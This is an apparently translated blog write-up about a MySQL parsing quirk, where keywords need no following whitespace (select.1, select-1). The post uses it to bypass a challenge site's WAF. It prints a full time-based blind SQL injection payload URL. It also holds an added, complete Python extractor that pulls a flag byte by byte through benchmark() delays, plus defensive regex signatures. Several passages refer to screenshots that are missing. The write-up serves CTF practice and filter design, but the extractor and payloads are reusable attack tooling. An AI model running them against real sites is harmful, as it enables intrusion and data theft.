From chance to discover a MySQL feature to Wooyun WAF bypass problem



mayikissyou | 2015-06-19 12:00

During a test I happened upon a MySQL feature by chance.

Why do I call it chance?

During a test I did the following on the MySQL console:

Notice anything?

I found that when a symbol such as -, + or { caused an error, the message pointed at the symbol itself (for the double quote, the message said just "), but when I put 1, a or similar content directly after select, the message reported

selecta, select1 and so on.

The common thread: -, + and { can be placed directly after select. I already knew that from SQL injection summary posts.

For example

select-1;

select+1;

select{x 1};

whereas 1, a and the like placed directly after select simply produce an error.
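The security-relevant consequence of the three forms above (and the selecta / select1 errors before them) is that MySQL does not need whitespace after a keyword; it only needs the next character to be one that cannot continue an identifier. A filter that looks for "select " followed by a space is therefore looking for something the parser does not require. The following is an added example, not code from the original post and not the rules of any real WAF: two constructed regex signatures are run over the payload shapes discussed on this page, and the whitespace-anchored one misses every no-whitespace form while the identifier-boundary one, which mirrors the lexer's own rule, catches them without flagging benign words such as "selection".

```python
"""Added example (not from the original post): why a whitespace-anchored
SQL-keyword signature misses the no-whitespace SELECT forms described above.

The rules and payloads are constructed for illustration; they are not the
rules of any real WAF, and in particular not the rules of the Wooyun WAF.
"""
import re

# A naive signature: the keyword must be followed by whitespace ("select 1").
NAIVE_RULE = re.compile(r"\b(select|union|and)\s+", re.IGNORECASE)

# A boundary-based signature: the keyword must not be immediately followed by
# another identifier character. That is the rule MySQL's lexer applies:
# "selecta" and "select1" are one identifier, while "select-1", "select.1",
# "select{x 1}" and "select`col`" are the keyword followed by a separate
# token. Only the ASCII identifier characters ([0-9a-zA-Z$_]) are modelled.
BOUNDARY_RULE = re.compile(r"\b(select|union|and)(?![a-z0-9_$])", re.IGNORECASE)

# Constructed test inputs: the forms from the post plus some benign strings.
# True means "this is an injection attempt and a rule should flag it".
PAYLOADS = {
    "select 1": True,
    "select-1": True,
    "select+1": True,
    "select{x 1}": True,
    "select.1": True,
    "select(1)": True,
    "select`schema_name`from`information_schema`.`schemata`": True,
    "1'>(select.1)": True,
    "selecta": False,              # one identifier to MySQL, not a keyword
    "select1": False,
    "selection criteria": False,   # a plain English word
    "hello world": False,
}


def naive_flags(s: str) -> bool:
    """Whitespace-anchored rule: True if the input is flagged."""
    return NAIVE_RULE.search(s) is not None


def boundary_flags(s: str) -> bool:
    """Identifier-boundary rule: True if the input is flagged."""
    return BOUNDARY_RULE.search(s) is not None


def false_negatives(rule):
    """Injection attempts the rule lets through."""
    return [p for p, attack in PAYLOADS.items() if attack and not rule(p)]


def false_positives(rule):
    """Benign inputs the rule flags."""
    return [p for p, attack in PAYLOADS.items() if not attack and rule(p)]


if __name__ == "__main__":
    for name, rule in (("naive", naive_flags), ("boundary", boundary_flags)):
        print(name, "misses:", false_negatives(rule))
        print(name, "over-blocks:", false_positives(rule))
```

The boundary rule is closer to the parser but still not the parser: it says nothing about comments, alternative encodings or keywords split by other tokens, so a filter that wants to be robust should tokenize the input the way the database does rather than pattern-match the raw string.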

Looking back at the screenshot, I noticed that the double-quote case after select also gave a hint, so I began to suspect that it could be placed directly after select too.

Now that the select form was accepted, the task at this point was to close the statement so that it would execute normally.

This can also be tested by hand:

I don't remember how many payloads I tried, but when I entered the following, I got a little happy:

It gave the hint:

Unknown table ' 1 ' in field List

Then I did the following:

I saw it. The statement used was:

select.".schema_name from information_schema.schemata;

PS. I can only say my luck was good.

This proves that select can be followed directly.

---------------------------------------------------------Gorgeous split-line----------------------------

Wooyun WAF Bypass

It was a painful experience. The testing process felt different from the usual WAF, and I felt like a bad hacker every time I pieced together a bypass statement to execute.

Since I started at 12 o'clock at night and found there was already an answer, after an hour of testing with no result I went to read the write-up.

I was completely floored: my approach was not on the same channel at all; I never thought of this brilliant method.

Let's get down to the idea.

1: Entering ' gives an error and the query is a LIKE query. A preliminary check suggested there is no content inside and there is no echo, and the SQL error is not MySQL's own error message, so UNION and error-based injection are basically out; consider time-based blind injection.

PS. I had been fighting with the filtering of AND and UNION, but the point is that I could not work out the rules. Well, today 小V said it is not rule-based, and I am a little tired.

2: Because it is time-based blind, the pattern will look like this:

if (condition, sleep a few seconds, don't sleep)

It seemed that AND and the like could not be used, so I used a comparison operator directly:

http://rile.gou.gg/search?query=1%27>(select[])

Here, all kinds of input returned errors, and then trying select. seemed to succeed.

Feeling there was a chance, I pieced the following payload together bit by bit. Here I was lazy and did not extract the data myself but took the name from the expert's write-up directly. The final payload:

http://rile.gou.gg/search?query=1%27>(select.".schema_name from(select.".schema_name,if(ascii(mid((select * from test.flag),1,1))=102,(benchmark(5000000,sha(1))),1) from information_schema.schemata)x)%23

Modify the lijiejie script a little and it dumps the flag directly:

A few of the results did not come out; the delay is unstable.

PS. Well, it is annoying, and now I am stuck.
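The instability above is the usual failure mode of time-based extraction: one slow response on a false condition is read as a true one and a wrong byte lands in the result. The following is an added example, not the author's script and not lijiejie's: it builds the same if(condition, benchmark(5000000,sha(1)), 1) comparison-style payload against test.flag as the write-up, then decides each byte on the median of several timings against a threshold calibrated from a query known to be false, so that a single slow response cannot flip a decision. The transport is left to a caller-supplied send function and the injection point is assumed (hypothetically) to take the raw query string; the threshold factor and sample counts are my own choices.

```python
"""Added example, not the author's script and not lijiejie's: time-based
blind extraction using the if(cond, benchmark(...), 1) pattern from the
write-up, made robust against unstable delays by median-of-samples timing.

Assumptions (hypothetical): `send(payload)` delivers the raw query string to
the injection point (for the page's target that would be an HTTP GET on the
search parameter); the table test.flag, the 5000000 benchmark rounds and the
comparison-operator form are taken from the post; threshold and sample
counts are my own choices.
"""
import statistics
import time
from typing import Callable, Iterable, Optional

Send = Callable[[str], None]


def build_payload(pos: int, code: int, rounds: int = 5000000) -> str:
    """Heavy benchmark() when byte `pos` of the flag has ASCII value `code`,
    a constant otherwise. A comparison operator is used instead of AND, as
    in the write-up, and the trailing # comments out the rest of the query."""
    return (
        "1'>(select if(ascii(mid((select * from test.flag),%d,1))=%d,"
        "benchmark(%d,sha(1)),1))#" % (pos, code, rounds)
    )


def timed(send: Send, payload: str) -> float:
    """Seconds taken by one request."""
    t0 = time.monotonic()
    send(payload)
    return time.monotonic() - t0


def is_true(send: Send, payload: str, threshold: float, samples: int = 3) -> bool:
    """Decide on the median of several measurements: one spurious slow
    response among `samples` requests does not push the median over the
    threshold, which is what a single-shot check gets wrong."""
    times = [timed(send, payload) for _ in range(samples)]
    return statistics.median(times) > threshold


def calibrate(send: Send, samples: int = 5) -> float:
    """Threshold derived from a query that is always false: ascii() never
    returns 256, so this measures the cost of the non-benchmark branch."""
    baseline = [timed(send, build_payload(1, 256)) for _ in range(samples)]
    return 3 * max(statistics.median(baseline), 0.001)


def extract(send: Send, max_len: int = 32,
            charset: Iterable[int] = range(32, 127),
            threshold: Optional[float] = None) -> str:
    """Recover test.flag byte by byte. ascii(mid(s,pos,1)) is 0 once pos is
    past the end of the string, so code 0 is used as the terminator test."""
    if threshold is None:
        threshold = calibrate(send)
    out = ""
    for pos in range(1, max_len + 1):
        if is_true(send, build_payload(pos, 0), threshold):
            break                      # past the end of the flag
        for code in charset:
            if is_true(send, build_payload(pos, code), threshold):
                out += chr(code)
                break
        else:
            raise RuntimeError("no byte matched at position %d" % pos)
    return out
```

Equality tests cost one request per candidate byte, which is what the write-up's script does; replacing the =102 comparison with a < comparison and binary-searching the byte value cuts that to about seven requests per character, at the price of making every request a timing decision that the same median filter has to protect.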
